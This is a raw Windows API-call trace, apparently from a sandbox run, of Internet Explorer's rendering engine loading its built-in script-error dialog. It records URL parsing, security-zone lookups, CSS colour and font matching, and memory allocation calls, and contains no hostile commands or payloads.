CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.472] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x1951bc | out: ppURI=0x1951bc*=0x9ee0cc4) returned 0x0 [0159.472] IUri:GetHost (in: This=0x9ee0cc4, pbstrHost=0x1951c0 | out: pbstrHost=0x1951c0*="ieframe.dll") returned 0x0 [0159.472] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x1951c8, cchResult=0x1000, pcchResult=0x1951b0, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x1951b0) returned 0x0 [0159.473] SysReAllocString (in: pbstr=0x1951c0*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x1951c0*="ieframe.dll") returned 1 [0159.473] IUri:GetPath (in: This=0x9ee0cc4, pbstrPath=0x1951c4 | out: pbstrPath=0x1951c4*="/error.js") returned 0x0 [0159.473] CoInternetParseUrl (in: pwzUrl="/error.js", ParseAction=0x13, dwFlags=0x0, pszResult=0x1951c8, cchResult=0x1000, pcchResult=0x1951b0, dwReserved=0x0 | out: pszResult="/error.js", pcchResult=0x1951b0) returned 0x0 [0159.473] SysReAllocString (in: pbstr=0x1951c4*="/error.js", psz="/error.js" | out: pbstr=0x1951c4*="/error.js") returned 1 [0159.473] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3a48 [0159.473] IUnknown:Release (This=0x9ee0cc4) returned 0x3 [0159.473] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x1971fc, lpFilePart=0x1971f4 | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x1971f4*="ieframe.dll") returned 0x1f [0159.473] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3a48 | out: hHeap=0x5e0000) returned 1 [0159.473] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.475] IUnknown:AddRef (This=0x6cdf88) returned 0x3 [0159.475] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.js", pdwZone=0x199fb4, dwFlags=0x0 | out: pdwZone=0x199fb4*=0xffffffff) returned 0x800c0011 [0159.475] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x199fc4 | out: pdwScheme=0x199fc4*=0x12) returned 0x0 [0159.475] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.475] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x199fb8 | out: pdwScheme=0x199fb8*=0x12) returned 0x0 [0159.475] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199fac, dwFlags=0x1 | out: pdwZone=0x199fac*=0xffffffff) returned 0x800c0011 [0159.475] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x199f4c | out: pdwScheme=0x199f4c*=0x12) returned 0x0 [0159.475] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199f0c | out: ppvObject=0x199f0c*=0x68dcbc) returned 0x0 [0159.476] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.476] IUnknown:AddRef (This=0x68dcbc) returned 0x6 [0159.476] StrCmpICW (pszStr1="ieframe.dll", pszStr2="ieframe.dll") returned 0 [0159.476] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.476] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.476] IUnknown:Release (This=0x6cdf88) returned 0x2 [0159.476] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.476] GetProcessHeap () returned 0x5e0000 [0159.476] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6ab) returned 0x9ef3f00 [0159.477] StrCmpICW (pszStr1="JavaScript", pszStr2="javascript") returned 0 [0159.477] StrCmpICW (pszStr1="JavaScript", pszStr2="javascript") returned 0 [0159.477] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.477] GetCurrentProcessId () returned 0xe14 [0159.477] IUri:GetAbsoluteUri (in: This=0x68dcbc, pbstrAbsoluteUri=0x199fc0 | out: pbstrAbsoluteUri=0x199fc0*="res://ieframe.dll/error.js") returned 0x0 [0159.477] IUnknown:AddRef (This=0x68dcbc) returned 0x6 [0159.477] IUri:IsEqual (in: This=0x68dcbc, pUri=0x68dcbc, pfEqual=0x199fb4 | out: pfEqual=0x199fb4*=1) returned 0x0 [0159.477] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.477] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef45b8 | out: hHeap=0x5e0000) returned 1 [0159.478] IUnknown:Release (This=0x68dcbc) returned 0x4 [0159.478] IUnknown:Release (This=0x68dcbc) returned 0x3 [0159.478] _wcsnicmp (_String1="erro", _String2="data", _MaxCount=0x4) returned 1 [0159.478] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.478] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.478] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.478] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x19a058, dwFlags=0x0 | out: pdwZone=0x19a058*=0xffffffff) returned 0x800c0011 [0159.478] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.478] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.478] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.478] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x19a05c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19a03c | out: pPolicy=0x19a05c*=0x0, pdwOutFlags=0x19a03c*=0x0) returned 0x0 [0159.478] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x19a05c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19a05c*=0x0) returned 0x0 [0159.478] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.478] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.479] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.479] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.479] GetCurrentThreadId () returned 0xb48 [0159.479] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de7c8 | out: hHeap=0x5e0000) returned 1 [0159.479] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.480] StrChrW (lpStart="topmargin", wMatch=0x3a) returned 0x0 [0159.480] IsCharSpaceW (wch=0x30) returned 0 [0159.480] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.480] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.480] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0159.480] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.480] IsCharSpaceW (wch=0x66) returned 0 [0159.480] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.480] IsCharSpaceW (wch=0x3a) returned 0 [0159.480] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.480] IsCharSpaceW (wch=0x20) returned 1 [0159.480] IsCharSpaceW (wch=0x27) returned 0 [0159.481] IsCharAlphaNumericW (ch=0x27) returned 0 [0159.481] IsCharSpaceW (wch=0x3b) returned 0 [0159.481] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.481] IsCharSpaceW (wch=0xd) returned 1 [0159.481] IsCharSpaceW (wch=0xa) returned 1 [0159.481] IsCharSpaceW (wch=0x66) returned 0 [0159.481] IsCharSpaceW (wch=0x27) returned 0 [0159.481] IsCharSpaceW (wch=0x27) returned 0 [0159.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9ef3bd8 [0159.481] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.481] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.481] IsCharSpaceW (wch=0x3a) returned 0 [0159.481] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.481] IsCharSpaceW (wch=0x20) returned 1 [0159.481] IsCharSpaceW (wch=0x38) returned 0 [0159.481] IsCharAlphaNumericW (ch=0x38) returned 1 [0159.481] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.482] IsCharSpaceW (wch=0x3b) returned 0 [0159.482] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.482] IsCharSpaceW (wch=0x20) returned 1 [0159.482] IsCharSpaceW (wch=0x62) returned 0 [0159.482] IsCharSpaceW (wch=0x74) returned 0 [0159.482] IsCharSpaceW (wch=0x38) returned 0 [0159.482] IsCharSpaceW (wch=0x38) returned 0 [0159.482] IsCharSpaceW (wch=0x74) returned 0 [0159.482] IsCharSpaceW (wch=0x38) returned 0 [0159.482] IsCharSpaceW (wch=0x70) returned 0 [0159.482] IsCharSpaceW (wch=0x74) returned 0 [0159.482] IsCharSpaceW (wch=0x0) returned 0 [0159.482] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.482] IsCharSpaceW (wch=0x3a) returned 0 [0159.482] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.482] IsCharSpaceW (wch=0x20) returned 1 [0159.482] IsCharSpaceW (wch=0x74) returned 0 [0159.482] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.482] IsCharSpaceW (wch=0x3b) returned 0 [0159.482] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.482] IsCharSpaceW (wch=0x20) returned 1 [0159.483] IsCharSpaceW (wch=0x63) returned 0 [0159.483] IsCharSpaceW (wch=0x65) returned 0 [0159.483] IsCharSpaceW (wch=0x74) returned 0 [0159.483] IsCharSpaceW (wch=0x74) returned 0 [0159.483] IsCharSpaceW (wch=0x65) returned 0 [0159.484] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.484] IsCharSpaceW (wch=0x74) returned 0 [0159.484] IsCharSpaceW (wch=0x68) returned 0 [0159.484] IsCharSpaceW (wch=0x72) returned 0 [0159.484] IsCharSpaceW (wch=0x65) returned 0 [0159.484] IsCharSpaceW (wch=0x65) returned 0 [0159.484] IsCharSpaceW (wch=0x64) returned 0 [0159.484] IsCharSpaceW (wch=0x66) returned 0 [0159.484] IsCharSpaceW (wch=0x61) returned 0 [0159.484] IsCharSpaceW (wch=0x63) returned 0 [0159.484] IsCharSpaceW (wch=0x65) returned 0 [0159.484] IsCharSpaceW (wch=0x68) returned 0 [0159.484] IsCharSpaceW (wch=0x72) returned 0 [0159.484] IsCharSpaceW (wch=0x65) returned 0 [0159.484] IsCharSpaceW (wch=0x65) returned 0 [0159.484] IsCharSpaceW (wch=0x64) returned 0 [0159.484] IsCharSpaceW (wch=0x66) returned 0 [0159.485] IsCharSpaceW (wch=0x61) returned 0 [0159.485] IsCharSpaceW (wch=0x63) returned 0 [0159.485] IsCharSpaceW (wch=0x65) returned 0 [0159.485] bsearch (_Key=0x199900, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0159.485] _wcsnicmp (_String1="threedface", _String2="lightgrey", _MaxCount=0xa) returned 8 [0159.485] _wcsnicmp (_String1="threedface", _String2="paleturquo", _MaxCount=0xa) returned 4 [0159.485] _wcsnicmp (_String1="threedface", _String2="silver", _MaxCount=0xa) returned 1 [0159.485] _wcsnicmp (_String1="threedface", _String2="teal", _MaxCount=0xa) returned 3 [0159.485] _wcsnicmp (_String1="threedface", _String2="wheat", _MaxCount=0xa) returned -3 [0159.485] _wcsnicmp (_String1="threedface", _String2="tomato", _MaxCount=0xa) returned -7 [0159.485] _wcsnicmp (_String1="threedface", _String2="thistle", _MaxCount=0xa) returned 9 [0159.485] bsearch (_Key=0x199900, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81ea70 [0159.485] _wcsnicmp (_String1="threedface", _String2="inactiveca", _MaxCount=0xa) returned 11 [0159.485] _wcsnicmp (_String1="threedface", _String2="threeddark", _MaxCount=0xa) returned 2 [0159.485] _wcsnicmp (_String1="threedface", _String2="threedshad", _MaxCount=0xa) returned -13 [0159.486] _wcsnicmp (_String1="threedface", _String2="threedhigh", _MaxCount=0xa) returned -2 [0159.486] _wcsnicmp (_String1="threedface", _String2="threedface", _MaxCount=0xa) returned 0 [0159.486] IsCharSpaceW (wch=0x0) returned 0 [0159.486] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0159.486] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b64d8 [0159.486] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.486] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.486] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.486] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.487] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x9ef10b0 [0159.487] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.487] IsCharSpaceW (wch=0x3a) returned 0 [0159.487] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.487] IsCharSpaceW (wch=0x20) returned 1 [0159.487] IsCharSpaceW (wch=0x77) returned 0 [0159.487] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.487] IsCharSpaceW (wch=0x3b) returned 0 [0159.487] IsCharAlphaNumericW (ch=0x3b) returned 0 [0159.487] IsCharSpaceW (wch=0x74) returned 0 [0159.487] IsCharSpaceW (wch=0x77) returned 0 [0159.487] IsCharSpaceW (wch=0x77) returned 0 [0159.487] IsCharSpaceW (wch=0x74) returned 0 [0159.488] bsearch (_Key=0x199c40, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0159.488] _wcsnicmp (_String1="windowtext", _String2="lightgrey", _MaxCount=0xa) returned 11 [0159.488] _wcsnicmp (_String1="windowtext", _String2="paleturquo", _MaxCount=0xa) returned 7 [0159.488] _wcsnicmp (_String1="windowtext", _String2="silver", _MaxCount=0xa) returned 4 [0159.488] _wcsnicmp (_String1="windowtext", _String2="teal", _MaxCount=0xa) returned 3 [0159.488] _wcsnicmp (_String1="windowtext", _String2="wheat", _MaxCount=0xa) returned 1 [0159.488] _wcsnicmp (_String1="windowtext", _String2="whitesmoke", _MaxCount=0xa) returned 1 [0159.488] _wcsnicmp (_String1="windowtext", _String2="yellow", _MaxCount=0xa) returned -2 [0159.488] bsearch (_Key=0x199c40, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81eaa0 [0159.488] _wcsnicmp (_String1="windowtext", _String2="inactiveca", _MaxCount=0xa) returned 14 [0159.488] _wcsnicmp (_String1="windowtext", _String2="threeddark", _MaxCount=0xa) returned 3 [0159.488] _wcsnicmp (_String1="windowtext", _String2="threedshad", _MaxCount=0xa) returned 3 [0159.489] _wcsnicmp (_String1="windowtext", _String2="windowfram", _MaxCount=0xa) returned 14 [0159.489] _wcsnicmp (_String1="windowtext", _String2="windowtext", _MaxCount=0xa) returned 0 [0159.489] IsCharSpaceW (wch=0x77) returned 0 [0159.489] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.489] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x6b6518 [0159.489] StrChrW (lpStart="onLoad", wMatch=0x3a) returned 0x0 [0159.489] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.489] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x9ef0ed0 [0159.489] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.490] StrChrW (lpStart="ID", wMatch=0x3a) returned 0x0 [0159.490] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x9ef0ef0 [0159.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.491] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.491] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.491] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.491] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199f50, dwFlags=0x0 | out: pdwZone=0x199f50*=0xffffffff) returned 0x800c0011 [0159.491] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.491] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.491] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.491] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x199f54, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199f34 | out: pPolicy=0x199f54*=0x0, pdwOutFlags=0x199f34*=0x0) returned 0x0 [0159.491] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x199f54, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199f54*=0x0) returned 0x0 [0159.491] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.491] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.491] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.491] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x9ef1150 [0159.497] GetCurrentThreadId () returned 0xb48 [0159.497] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0159.497] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0159.498] realloc (_Block=0x0, _Size=0xc8) returned 0xc51038 [0159.498] malloc (_Size=0x61) returned 0xc51108 [0159.498] malloc (_Size=0x80) returned 0xc4d918 [0159.498] malloc (_Size=0x22c) returned 0xc51178 [0159.498] malloc (_Size=0x804) returned 0xc513b0 [0159.498] malloc (_Size=0x19c) returned 0xc51bc0 [0159.499] free (_Block=0xc51bc0) [0159.499] wcscpy_s (in: _Destination=0x7368cf0, _SizeInWords=0x7, _Source="onload" | out: _Destination="onload") returned 0x0 [0159.500] malloc (_Size=0xc) returned 0xc52290 [0159.500] malloc (_Size=0xc) returned 0xc52248 [0159.500] malloc (_Size=0x10) returned 0xc522c0 [0159.500] malloc (_Size=0x30) returned 0xc5a920 [0159.500] free (_Block=0xc513b0) [0159.500] free (_Block=0xc51178) [0159.500] malloc (_Size=0x20) returned 0xc485e8 [0159.500] free (_Block=0xc51108) [0159.500] malloc (_Size=0xc) returned 0xc52230 [0159.500] free (_Block=0xc51038) [0159.500] GetTickCount () returned 0x1d728b8 [0159.500] GetTickCount () returned 0x1d728b8 [0159.501] GetCurrentThreadId () returned 0xb48 [0159.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1150 | out: hHeap=0x5e0000) returned 1 [0159.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.502] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3097832146677) returned 1 [0159.503] SetEvent (hEvent=0x304) returned 1 [0159.505] StrCmpICW (pszStr1="res://ieframe.dll/error.dlg", pszStr2="about:blank") returned 17 [0159.505] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x19a118 | out: ppu=0x19a118) returned 0x0 [0159.505] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.505] IUri:GetAbsoluteUri (in: This=0x68e1fc, pbstrAbsoluteUri=0x19a1b0 | out: pbstrAbsoluteUri=0x19a1b0*="res://ieframe.dll/error.dlg") returned 0x0 [0159.505] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.505] GetCurrentThreadId () returned 0xb48 [0159.506] ShouldShowIntranetWarningSecband () returned 0x0 [0159.506] GetIUriPriv () returned 0x0 [0159.506] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.506] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19a044 | out: ppvObject=0x19a044*=0x68e1fc) returned 0x0 [0159.506] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.506] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.507] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19a044 | out: ppvObject=0x19a044*=0x68e1fc) returned 0x0 [0159.507] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.507] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0159.507] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.507] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.507] QueryPerformanceCounter (in: lpPerformanceCount=0x19a100 | out: lpPerformanceCount=0x19a100*=3097832633746) returned 1 [0159.508] GetCurrentThreadId () returned 0xb48 [0159.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0159.508] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.509] SetWindowTextW (hWnd=0x103e0, lpString="Script Error") returned 1 [0159.509] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.509] NtdllDefWindowProc_W () returned 0x1 [0159.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.509] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.510] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b64b8 [0159.510] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b64b8 | out: hHeap=0x5e0000) returned 1 [0159.510] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0159.510] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.510] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19968c | out: ppvObject=0x19968c*=0x68e1fc) returned 0x0 [0159.510] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.511] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0159.511] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.511] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.511] StrCmpNW (lpStr1="res://ieframe.dll/", lpStr2="res://ieframe.dll/", nChar=18) returned 0 [0159.511] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x1996fc | out: ppURI=0x1996fc*=0x68e1fc) returned 0x0 [0159.511] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x1996f8 | out: pdwScheme=0x1996f8*=0x12) returned 0x0 [0159.511] IUri:GetFragment (in: This=0x68e1fc, pbstrFragment=0x1996f0 | out: pbstrFragment=0x1996f0*="") returned 0x1 [0159.511] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.511] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x14, dwReserved=0x0, ppURI=0x19973c | out: ppURI=0x19973c*=0x9ee0b04) returned 0x0 [0159.512] IUnknown:AddRef (This=0x9ee0b04) returned 0x4 [0159.512] IUri:GetHostType (in: This=0x9ee0b04, pdwHostType=0x1996ec | out: pdwHostType=0x1996ec*=0x0) returned 0x0 [0159.512] LoadImageW (hInst=0x6d6d0000, name=0xa7c, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x23039b [0159.513] GetSystemMetrics (nIndex=50) returned 16 [0159.513] GetSystemMetrics (nIndex=49) returned 16 [0159.513] LoadImageW (hInst=0x6d6d0000, name=0xa7d, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x550359 [0159.516] SendMessageW (hWnd=0x0, Msg=0x40f, wParam=0x2, lParam=0x0) returned 0x0 [0159.516] SendMessageW (hWnd=0x0, Msg=0x411, wParam=0x2, lParam=0x0) returned 0x0 [0159.516] SendMessageW (hWnd=0x0, Msg=0x40b, wParam=0x2, lParam=0x0) returned 0x0 [0159.516] MonitorFromWindow (hwnd=0x70258, dwFlags=0x2) returned 0x10001 [0159.516] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x19a064 | out: lpmi=0x19a064) returned 1 [0159.517] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.517] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.517] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.517] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0159.518] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0159.518] EnumFontFamiliesExW (hdc=0x33010a5b, lpLogfont=0x197be8, lpProc=0x6dd71af0, lParam=0x197be8, dwFlags=0x0) returned 1 [0159.519] CreateFontIndirectW (lplf=0x197be8) returned 0x40a0a78 [0159.519] SelectObject (hdc=0x33010a5b, h=0x40a0a78) returned 0x18a0048 [0159.519] GetTextFaceW (in: hdc=0x33010a5b, c=32, lpName=0x197c8c | out: lpName="Arial") returned 6 [0159.520] DeleteObject (ho=0x40a0a78) returned 1 [0159.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9ef3778 [0159.520] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0159.520] StrCmpICW (pszStr1="Content-Type", pszStr2="MSThemeCompatible") returned -10 [0159.520] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="MSThemeCompatible") returned 0 [0159.522] StrCmpICW (pszStr1="Yes", pszStr2="Yes") returned 0 [0159.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.523] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.523] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.523] memcpy_s (in: _Destination=0x198a50, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x198a50) returned 0x0 [0159.523] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0159.523] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0159.523] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0159.523] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0159.523] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0159.524] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0159.524] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 